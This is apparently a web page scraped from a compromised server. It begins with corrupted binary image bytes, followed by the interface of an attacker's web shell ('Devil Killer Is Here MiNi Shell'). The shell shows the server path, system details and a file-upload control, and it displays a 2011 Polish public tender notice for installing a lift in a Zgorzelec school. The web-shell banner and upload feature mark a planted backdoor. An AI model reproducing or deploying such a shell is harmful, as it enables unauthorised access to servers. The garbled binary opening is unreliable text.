JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110110/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110110/9533-N-2011.html

<p class="kh_header"><b>Zgorzelec: Montaż dźwigu osobowego w Gimnazjum Nr 2 - likwidacja barier architektonicznych.</b><br>
<b>Numer ogłoszenia: 9533 - 2011; data zamieszczenia: 10.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Zgorzelec , ul. Domańskiego 7, 59-900 Zgorzelec, woj. dolnośląskie, tel. 0-75 77 56 988, faks 075 77 56 988.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um-zgorzelec.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Montaż dźwigu osobowego w Gimnazjum Nr 2 - likwidacja barier architektonicznych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa oraz montaż dźwigu osobowego w istniejącym szybie w budynku Gimnazjum Nr 2 w Zgorzelcu wraz z robotami towarzyszącymi. 
2.	Inwestycja prowadzona będzie w budynku Gimnazjum Nr 2 w Zgorzelcu. Budynek jest              w kształcie prostokąta, podpiwniczony, 4- kondygnacyjny z poddaszem użytkowym, zaadoptowany w 2002 r. z budynku pokoszarowego. W trakcie przebudowy do budynku została dobudowana oddzielna klatka schodowa z centralnie umieszczonym szybem windy dla osób niepełnosprawnych.
3.	Opis stanu istniejącego:
1)	Klatka schodowa jest w stanie ogólnym bardzo dobrym. Fundament klatki schodowej wykonany z płyt żelbetowych, ściany murowane z Porothermu, strop żelbetowy typu Filigran, schody trzybiegowe żelbetowe, szyb windy żelbetowy, przystosowany dla dźwigu hydraulicznego, maszynownia dźwigu znajduje się w pomieszczeniu piwnicznym budynku głównego. Dach pokryty jest dachówką karpiówką, więźba dachowa drewniana, dach krokwiowy.
2)	Istniejący szyb dźwigu nie był nigdy eksploatowany. Otwory drzwiowe do szybu na wszystkich pięciu przystankach zostały zamknięte zabudową lekką z płyt gipsowo kartonowych, na konstrukcji drewnianej. Ściany wewnętrzne szybu wykończone zostały tynkiem maszynowym i pomalowane białą farbą emulsyjną. Krawędzie otworów drzwi przystankowych są w stanie surowym.
4.	Charakterystyka techniczna dźwigu:
1)	Typ: AH 630-T-90
2)	Przeznaczenie: transport osobowy
3)	Napęd: hydrauliczny, pośredni, z siłownikiem bocznym
4)	Udźwig: 630kg lub 8 osób
5)	Wymiary kabiny: 1100x1400x2200mm
6)	Wysokość podnoszenia: 13,25m
7)	Sterowanie: mikroprocesorowe, zbiorcze jednokierunkowe
8)	Rodzaj drzwi: automatyczne, teleskopowe, dwupanelowe
9)	Kabina: nieprzelotowa
10)	Zasilanie: trójfazowe, 3-400V/50Hz
11)	Położenie maszynowni: dolna  
12)	Wyposażenie: wentylator w kabinie, gong, zjazd ppoż., awaryjny zjazd po zaniku napięcia, autodialer - system awaryjnego łączenia się z telefonem alarmowym, interkom z kabiny do maszynowni, sygnalizacja przeciążenia, alarm, 2 godzinne awaryjne oświetlenie, przyciski metalowe typu antywandal z alfabetem Braillea.
13)	Dostarczony dźwig musi być fabrycznie nowy, nieeksploatowany przez innego użytkownika, wyprodukowany nie wcześniej niż w 2010 r., wolny od wad fizycznych rzeczy, jak również od jakichkolwiek wad prawnych i roszczeń osób trzecich.

5.	Zakres prac montażowych obejmuje:
1)	Zakres prac przygotowawczych:
a)	demontaż osłon z płyt gipsowo-kartonowych i konstrukcji drewnianej na otworach drzwiowych przystanków,
b)	 naprawa posadzki w maszynowni i podszybiu,
c)	 montaż nad stropem szybu kanału wentylacyjnego oraz wywiewki dachowej,
d)	 montaż haka montażowego w nadszybiu,
e)	wykonanie wnęk i drabinek do podszybia,
f)	montaż podestów montażowych na każdej kondygnacji,
g)	malowanie maszynowni,
h)	wymiana wentylatora wywiewnego w maszynowni,
i)	wymiana zamka w drzwiach maszynowni na zamek umożliwiający otwarcie drzwi od wewnątrz bez użycia klucza,
j)	malowanie ścian maszynowni farbą nieścieralną.
2)	Zakres prac głównych:
a)	wykonanie oświetlenia szybu. Natężenie oświetlenia w każdym punkcie szybu nie powinno być mniejsze niż 50 luksów,
b)	w podszybiu umieścić gniazdo 230V, w szybie wyłącznik oświetlenia szybu,
c)	wykonanie tablicy wstępnej w maszynowni,
d)	wykonanie zasilania dźwigu oraz jego oświetlenia,
e)	w maszynowi umieścić wyłącznik oświetlenia szybu,
f)	zamontowanie agregatu hydraulicznego i szafy sterownej w maszynowni wraz                  z osprzętem i przewodami oraz zamontowanie dźwigu.
3)	Zakres prac wykończeniowych:
a)	wykonanie obróbek drzwi przystankowych,
b)	malowanie fragmentów ścian.
6.	Wykonawca zabezpieczy miejsce pracy w sposób nie kolidujący z pracą szkoły                               i zapewniający całkowite bezpieczeństwo uczniom.      
        
7.	Nazwy materiałów, urządzeń lub producentów wskazanych w dokumentacji, tj. Załączniku Nr 1 do SIWZ nie należy traktować jako narzuconych bądź sugerowanych przez Zamawiającego. Zamawiający dopuszcza ujęcie w ofercie, a następnie zastosowanie innych materiałów i urządzeń niż podane w dokumentacji, tj. Załączniku Nr 1 do SIWZ, pod warunkiem zapewnienia parametrów nie gorszych niż  w niej określone.
    W takiej sytuacji Zamawiający wymaga złożenia, na etapie składania oferty stosownych dokumentów, uwiarygodniających te materiały i urządzenia. Złożone ww. dokumenty będą podlegały ocenie przez autora dokumentacji projektowej, który sporządzi stosowną opinię. Opinia ta będzie podstawą do podjęcia przez Zamawiającego decyzji o odrzuceniu oferty              z powodu nierównoważności zaproponowanych zamienników.

8.	Wykonawca, jako wytwórca odpadów w rozumieniu art. 3 ust. 3 pkt. 22 ustawy                            o odpadach ma obowiązek zagospodarowania odpadów powstałych podczas realizacji zamówienia zgodnie z ustawą o odpadach z dnia 21.04.2001 r. (t.j. z 2007 r. Dz. U. Nr 39, poz. 251 ze zm.) oraz ustawą Prawo Ochrony Środowiska z dnia 27.04.2001 r. (t.j. z 2008 r. Dz. U. Nr 25, poz. 150). Wykonawca w terminie wskazanym w umowie przedstawi Zamawiającemu potwierdzenie zagospodarowania odpadów zgodnie z powszechnie obowiązującymi przepisami.
9.	Szczegółowy opis przedmiotu zamówienia obejmujący zestawienie wymaganych parametrów technicznych dot. windy i jej montażu oraz robót budowlanych zawierają projekt budowlany oraz Specyfikacja Techniczna wykonania i odbioru robót budowlanych stanowiące Załącznik nr 1 do SIWZ.

10.	Wymagany okres gwarancji:
1)	Zamawiający na dostarczone urządzenie, tj. dźwig osobowy wymaga minimum 36    miesięcy gwarancji i rękojmi.
2)	Zamawiający na wykonane roboty budowlane i zastosowane przy realizacji zamówienia materiały wymaga minimum 36 miesięcy gwarancji i rękojmi..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 42.41.61.00-6, 45.31.31.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 64.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca wniesie wadium w wysokości 1.837,00 zł przed upływem terminu  składania ofert, który został określony w pkt. 16.1 SIWZ.

2.	W zależności od woli Wykonawcy wadium może być wnoszone w formach:

1.	pieniądzu (przelew na rachunek bankowy wskazany przez zamawiającego),
2.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym
3.	gwarancjach bankowych,
4.	gwarancjach ubezpieczeniowych,
5.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).

3.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego Nr 35124012971111000025654013 w banku PeKaO S.A. I O/Zgorzelec,  z zaznaczeniem Wadium do postępowania nr WZP.341-69/10.
/kopię przelewu (wpłaty) proszę dołączyć do oferty/.
		
4.	Wykonawca, którego oferta nie będzie zabezpieczona akceptowalną formą wadium zostanie wykluczony z postępowania o udzielenie zamówienia, a jego oferta zostanie odrzucona zgodnie z art. 24 ust. 2 pkt 4 ustawy Prawo zamówień publicznych.

5.	Zamawiający zwróci wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt. 6 .
6.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń,                  o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to             z przyczyn nieleżących po jego stronie.

7.	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.



8.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1.	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
2.	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
3.	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe               z przyczyn leżących po stronie wykonawcy,
4.	w przypadku określonym w pkt. 6 .
9.	W przypadku wniesienia wadium w formach  wymienionych w pkt. 2 ppkt od 2 do 5                 z treści dokumentu musi jednoznacznie wynikać, iż wypłata Zamawiającemu sumy gwarancyjnej nastąpi także w przypadku określonym w pkt. 6 . 
10.	Wadium wniesione przez jednego ze wspólników konsorcjum uważa się za   wniesione prawidłowo.
11.	Zamawiający wymaga, aby niepieniężne formy zapłaty wadium miały charakter nieodwołalny i bezwarunkowy - równoważny pieniądzu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca w ww. zakresie złoży oświadczenie o spełnianiu warunku udziału                           w  postępowaniu.                
Ocena spełnienia warunku nastąpi na podstawie załączonego przez Wykonawcę do oferty oświadczenia, wymienionego w pkt. 10 A pkt. 2) SIWZ.
Nie wykazanie  w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie uznany za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia jest krótszy - w tym okresie wykonał:
a)	 2 dostawy polegające na dostawie i montażu dźwigu osobowego, z podaniem ich łącznej wartości brutto nie mniejszej niż 100 tys. oraz przedmiotu, dat wykonania            i odbiorców z załączeniem dokumentów potwierdzających, że dostawy te zostały wykonane należycie. (formularz Nr  3 do SIWZ).
Zamawiający informuje, iż w przypadku gdy Wykonawca przedstawi                       w wykazie dostaw, kwotę wyrażoną w innej walucie niż PLN, Zamawiający do oceny spełniania warunku przyjmie średni kurs tej waluty w stosunku do PLN publikowany przez NBP z dnia otwarcia ofert.
Ocena spełnienia warunku nastąpi na podstawie załączonych przez Wykonawcę do oferty dokumentów i oświadczeń, wymienionych w pkt. 10 SIWZ.
Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca w ww. zakresie złoży oświadczenie o spełnianiu warunku udziału                            w  postępowaniu.                
Ocena spełnienia warunku nastąpi na podstawie załączonego  przez Wykonawcę do oferty oświadczenia, wymienionego w pkt. 10A pkt. 2)SIWZ.
 Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie uznany za spełniony, jeżeli Wykonawca wykaże się    dysponowaniem:
a)	 kierownikiem budowy posiadającym uprawnienia budowlane                              w specjalności konstrukcyjno-budowlanej wraz z informacją o podstawie dysponowania tą osobą (należy podać podstawę dysponowania tą osobą,            np. umowa o pracę, umowa-zlecenie, umowa o dzieło, itp.)  - Wykonawca złoży oświadczenie o dysponowaniu bądź poleganiu na zasobach innych podmiotów w tym zakresie - formularz Nr 4 do SIWZ,
b)	złoży oświadczenie, że osoba, o której mowa w pkt. a) która będzie uczestniczyć w wykonywaniu zamówienia, posiada wymagane uprawnienia.
Ocena spełnienia powyższych warunków nastąpi na podstawie załączonych przez Wykonawcę do oferty  oświadczeń, wymienionych w pkt. 10 SIWZ.
Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tych  warunków spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca w ww. zakresie złoży oświadczenie o spełnianiu warunku udziału                            w  postępowaniu.                
Ocena spełnienia warunku nastąpi na podstawie załączonego przez Wykonawcę do oferty oświadczenia, wymienionego w pkt. 10A pkt.2) SIWZ.
 Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty Wykonawca musi złożyć następujące dokumenty, pod rygorem odrzucenia  oferty  zgodnie z art. 89 ust. 1 pkt. 2 , z zastrzeżeniem art. 87 ust. 2 pkt. 3 ustawy PZP oraz art. 26 ust. 3 w zakresie dokumentu wskazanego w pkt. 2:

1)	wypełniony  formularz cenowy - formularz Nr 1,

2)	oświadczenie o spełnianiu warunków, o których mowa w art. 22 ust.1 (formularz Nr  2 do SIWZ)
   
3)	wypełniony formularz oświadczenia wskazującego część zamówienia, której wykonawca powierzy podwykonawcom, z uwzględnieniem zapisu pkt. 9.2 SIWZ - formularz nr  5  do SIWZ.
W przypadku nie dołączenia do oferty powyższego formularza, bądź jego nie wypełnienia, Zamawiający uzna, że Wykonawca wykona zamówienie własnymi siłami.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający 
      przewiduje możliwość dokonania  zmiany postanowień zawartej umowy                               
      w stosunku do treści oferty, na podstawie której dokonał wyboru Wykonawcy.               Zakres przewidzianych zmian:  

1)	Zmianę kierownika budowy lub kierownika robót - Wykonawca może dokonywać zmiany kierownika budowy lub kierownika robót przedstawionych w ofercie jedynie za uprzednią pisemną zgodą Zamawiającego, akceptującego nowego kierownika budowy lub robót na następujących warunkach:

a)	Wykonawca proponuje zmianę kierownika budowy lub robót                     w szczególności w razie: śmierci, choroby lub zdarzeń losowych, niewywiązywania się z obowiązków wynikających z umowy, rezygnacji tej osoby, itp.
b)	Zamawiający może żądać od Wykonawcy zmiany kierownika budowy lub robót, jeżeli uzna, że nie wykonuje on swoich obowiązków wynikających z umowy.
Wykonawca obowiązany jest zmienić kierownika budowy lub robót zgodnie z żądaniem Zamawiającego w terminie wskazanym we wniosku Zamawiającego.
c)	W przypadku zmiany kierownika budowy lub robót, nowa osoba powołana do pełnienia ww. obowiązków musi spełniać wymagania określone w specyfikacji istotnych warunków zamówienia dla pełnienia danej funkcji.

2)	Przesunięcie terminu wykonania robót w przypadku wystąpienia opóźnień wynikających z:

a)	Przestojów i opóźnień zawinionych przez Zamawiającego, tzn. jeżeli takie opóźnienie jest lub będzie miało wpływ na termin realizacji  przedmiotu umowy w szczególności dotyczących następujących przypadków:

1.	przekazania terenu budowy,
2.	jakiekolwiek opóźnienia, utrudnienia, za które wykonawca nie ponosi odpowiedzialności.

b)	Pozostałe zmiany:

1.	Przekroczenie  zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń itp. Wykonawca będzie zobowiązany do przedstawienia Zamawiającemu dokumentów potwierdzających powyższą okoliczność.
2.	Wystąpienie istotnych wad dokumentacji projektowej, skutkujących koniecznością dokonania poprawek lub uzupełnień, jeżeli uniemożliwia to lub istotnie wstrzymuje realizację określonego rodzaju robót.
3.	Wstrzymanie robót przez uprawnione do tego organy.
4.	Odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na skutek błędów w dokumentacji projektowej. Wykonawca będzie zobowiązany do przedstawienia Zamawiającemu dokumentów potwierdzających powyższą okoliczność.
5.	Zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na termin realizacji przedmiotu zamówienia.           
6.	Działania siły wyższej, tj. zdarzenie nadzwyczajne, zewnętrzne, niemożliwe do przewidzenia i przeciwdziałania, uniemożliwiające wykonanie zobowiązań wynikających z umowy. 
7.	Zmiana podwykonawcy, która możliwa będzie jedynie wtedy, jeżeli zakres realizowanych przez podwykonawcę robót nie ulegnie zmianie w stosunku do zakresu robót wskazanych w ofercie Wykonawcy,                  a które zaplanował on do realizacji przez podwykonawcę. Zmiana taka możliwa będzie jedynie na uzasadniony wniosek Wykonawcy, do którego winien załączyć on projekt umowy z podwykonawcą, przy czym wymagana jest w tym przypadku pisemna zgoda Zamawiającego na zawarcie przez Wykonawcę umowy z innym podwykonawcą.
